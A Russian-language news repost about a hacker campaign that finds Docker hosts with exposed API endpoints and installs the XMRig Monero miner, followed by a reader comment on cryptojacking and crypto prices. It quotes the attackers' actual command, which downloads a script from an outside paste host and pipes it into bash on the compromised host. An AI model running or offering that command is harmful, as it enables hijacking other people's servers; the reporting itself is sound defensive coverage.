Скрытые майнеры криптовалюты обнаружены в уязвимых контейнерах Docker

Группа хакеров запустила масштабную кампанию по поиску Docker-контейнеров с открытыми конечными точками API для последующей установки на них майнера криптовалюты Monero (XMR). Проблема была обнаружена специалистами по кибербезопасности из компании Bad Packets LLC.

Docker представляет собой систему развертывания приложений, с поддержкой контейнеризации. Приложение со всем окружением можно упаковать в контейнер, которым легко и просто управлять: переносить на другой сервер, масштабировать или обновлять.

В настоящее время хакеры просканировали более 59 000 IP-сетей. После обнаружения уязвимого хоста злоумышленники используют конечную точку API для запуска контейнера ОС Alpine Linux и загрузки скрипта Bash:

chroot /mnt /bin/sh -c ‘curl -sL4 http://ix.io/1XQa | bash;

Этот скрипт устанавливает классический майнер криптовалюты XMRRig. За два дня хакеры добыли 14,82 XMR (около $815 на момент публикации).

Специалисты Bad Packets LLC рекомендуют пользователям Docker проверять, выставляют ли они свои конечные точки API в интернете, закрывать порты и завершать работу нераспознанных запущенных контейнеров.

Напомним, в октябре через образы контейнеров Docker из открытого депозитария Docker Hub распространялся червь, заразивший 2000 машин программой для скрытого майнинга Monero.

Источник: forklog.com

Оцените автора
( Пока оценок нет )
КриптоВики
Добавить комментарий

  1. Guiditta

    Между активностью попыток заражения браузеров скрытыми майнерами и стоимостью криптовалют, например, Bitcoin и Monero, действительно прослеживаются интересные параллели. Очевидно, что киберпреступники планируют свою деятельность с учетом популярности и курсов этих цифровых активов. За последние несколько месяцев число атак снизилось — как и стоимость большинства криптовалют. В сентябре 2019 года было зафиксированно усиление этой активности. Скорее всего, злоумышленники рассчитывают на взрывное подорожание криптовалют, какое было в 2017 году. Одна из причин, по которой киберпреступники усиливают атаки в период роста курсов криптовалют, заключается в том, что они тоже несут расходы. Им необходимо поддерживать собственные сайты, совершенствовать алгоритмы заражения других ресурсов, а также обслуживать командные серверы . Именно поэтому майнинг прибылен только в определенные периоды времени — например, при высоком курсе криптовалют по отношению к обычному курсу

    Ответить